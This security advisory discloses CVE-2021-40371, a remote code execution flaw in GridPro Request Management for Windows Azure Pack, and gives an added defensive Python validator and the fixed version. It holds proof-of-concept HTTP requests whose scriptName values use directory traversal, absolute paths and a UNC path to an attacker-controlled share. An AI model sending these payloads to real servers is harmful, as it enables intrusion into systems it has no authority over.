RCE in GridPro Request Management for Windows Azure Pack (CVE-2021-40371)

We recently discovered a vulnerability in GridPro Request Management versions <=2.0.7905 for Windows Azure Pack by GridPro Software. The vulnerability was assigned CVE-2021-40371 by GridPro [1] and, in the worst-case scenario, allows attackers to remotely execute code on the server.

Introduction

Windows Azure Pack delivers cloud capabilities to on-premise datacenters. GridPro Request Management for Azure Pack adds business processes, custom services, and customer support by integrating Microsoft System Center Service Manager with Windows Azure Pack in a unified cloud platform.

The vulnerability

GridPro Request Management for Windows Azure Pack provides the ability to execute PowerShell scripts. The plugin takes a relative path from specific JSON parameters in HTTP requests and executes the PowerShell script at that location on the server. Through multiple techniques, however, it is possible to reach PowerShell scripts in other directories that the application never intended to execute, which can lead to remote code execution.

  1. Through directory traversal attacks (e.g. using one or more ..\ sequences) it is possible to reach parent directories outside the original web directory and execute arbitrary local scripts the web server account has access to.
  2. Through fully qualified path names (e.g. C:\Temp\script.ps1) it is possible to execute arbitrary local scripts the web server account has access to, when the full path to the script is known.
  3. By using UNC paths (e.g. \\attacker-server\share$\script.ps1) it is possible to execute arbitrary PowerShell scripts from attacker-controlled remote network shares.

Proof of concept

Typical HTTP requests that execute PowerShell scripts on the server may look as follows. Note that each backslash in the path is doubled, as required by JSON string escaping:

POST /ServiceManagerTenant/GetVisibilityMap HTTP/2
Host: [vulnerableHost]
[...]
Connection: close

{"scriptName":"Directory1\\Directory2\\OriginalScript.ps1",[...]

By default, this relative path lies under the configured web server directory. The possible attack types to gain access to PowerShell scripts in other directories or shares are described in the following sections.

1. Directory Traversal

Using a directory traversal, it is possible to execute, for example, the local script C:\Temp\script.ps1:

POST /ServiceManagerTenant/GetVisibilityMap HTTP/2
Host: [vulnerableHost]
[...]
Connection: close

{"scriptName":"..\\..\\..\\..\\..\\..\\Temp\\script.ps1",[...]

An attacker can exploit this by writing or uploading arbitrary PowerShell scripts to the server and guessing their storage location to gain remote code execution or by abusing existing PowerShell scripts on the server.

2. Direct Access Using The Fully Qualified Path Name

Using the fully qualified path name it is again possible to execute, for example, the local script C:\Temp\script.ps1:

POST /ServiceManagerTenant/GetVisibilityMap HTTP/2
Host: [vulnerableHost]
[...]
Connection: close

{"scriptName":"C:\\Temp\\script.ps1",[...]

An attacker can exploit this by writing or uploading arbitrary PowerShell scripts to the server and knowing their exact storage location to gain remote code execution or by abusing existing PowerShell scripts on the server.

3. Execution Of Attacker-Controlled Scripts From Network Shares

Using UNC paths, it is possible to execute arbitrary scripts from remote, attacker-controlled network shares, for example:

POST /ServiceManagerTenant/GetVisibilityMap HTTP/2
Host: [vulnerableHost]
[...]
Connection: close

{"scriptName":"\\\\attacker-server\\share$\\script.ps1",[...]

An attacker can exploit this by preparing arbitrary PowerShell scripts on an attacker-controlled network share and having them executed on the target server to gain remote code execution.
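All three variants above share one root cause: the scriptName value is joined to the script directory without canonicalization or containment checks. The following is an added example of the kind of validation a defender would expect before a user-supplied name is passed to PowerShell; it is not GridPro's code and not taken from the advisory. The script root directory, the function names and the request bodies are constructed assumptions. It uses Python's ntpath module so that Windows path semantics (drive letters, UNC prefixes, rooted paths such as \Temp\x.ps1) are applied even when run on another platform.

```python
import json
import ntpath
import re
from typing import Optional

# Hypothetical script directory; the real location in a GridPro deployment is unknown.
SCRIPT_ROOT = r"C:\inetpub\wwwroot\ServiceManagerTenant\Scripts"

_SEPARATORS = re.compile(r"[\\/]")


def resolve_script_path(script_name: str, root: str = SCRIPT_ROOT) -> Optional[str]:
    """Map a user-supplied scriptName onto a path inside `root`.

    Returns the canonical full path when the name is acceptable, or None when
    it would escape the script directory (traversal, absolute path, UNC path,
    rooted path) or does not point at a .ps1 file.
    """
    if not script_name or "\x00" in script_name:
        return None

    # 1. Reject any ".." component outright (covers ..\ and ../ traversal,
    #    case 1 in the advisory), independent of later canonicalization.
    if any(part == ".." for part in _SEPARATORS.split(script_name)):
        return None

    # 2. Reject rooted and UNC names (\Temp\x.ps1, \\server\share\x.ps1).
    #    ntpath.join() would otherwise replace the directory part of `root`
    #    with a rooted second argument while keeping only the drive letter.
    if script_name[0] in "\\/":
        return None

    # 3. Reject fully qualified names (C:\Temp\script.ps1, case 2) and anything
    #    carrying a drive or UNC prefix (case 3).
    if ntpath.isabs(script_name) or ntpath.splitdrive(script_name)[0]:
        return None

    # 4. Canonicalize against the root and confirm containment on a
    #    separator boundary, so "C:\...\Scripts2\x.ps1" does not pass for
    #    a root of "C:\...\Scripts".
    root_norm = ntpath.normpath(root)
    full = ntpath.normpath(ntpath.join(root_norm, script_name))
    prefix = root_norm.rstrip("\\") + "\\"
    if not full.lower().startswith(prefix.lower()):
        return None

    # 5. Only PowerShell script files are executable through this path.
    if ntpath.splitext(full)[1].lower() != ".ps1":
        return None
    return full


def script_path_from_body(body: str) -> Optional[str]:
    """Parse a JSON request body like the advisory's examples and validate scriptName.

    JSON decoding turns the doubled backslashes in the body into single ones,
    which is the form the validation must operate on.
    """
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return None
    name = data.get("scriptName")
    if not isinstance(name, str):
        return None
    return resolve_script_path(name)


if __name__ == "__main__":
    # Constructed request bodies mirroring the advisory's examples.
    samples = [
        '{"scriptName":"Directory1\\\\Directory2\\\\OriginalScript.ps1"}',
        '{"scriptName":"..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Temp\\\\script.ps1"}',
        '{"scriptName":"C:\\\\Temp\\\\script.ps1"}',
        '{"scriptName":"\\\\\\\\attacker-server\\\\share$\\\\script.ps1"}',
    ]
    for body in samples:
        print(body, "->", script_path_from_body(body))
```

Only the first sample resolves to a path under the script root; the traversal, absolute and UNC variants are all rejected before anything is handed to PowerShell. The explicit ".." and leading-separator checks are deliberately redundant with the canonicalization step, since a single containment check is easy to get subtly wrong across platforms and path styles.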

Resolution

GridPro fixed this vulnerability in GridPro Request Management for Windows Azure Pack version 2.0.7912 and later [2].

Appendix

References

[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40371
[2] https://support.gridprosoftware.com/hc/en-us/articles/360021921513-Request-Management-for-WAP-Release-Notes
[3] https://certitude.consulting/advisories/CSA_2021_003_Remote_Code_Execution_in_GridPro_Request_Management_for_Windows_Azure_Pack.md.txt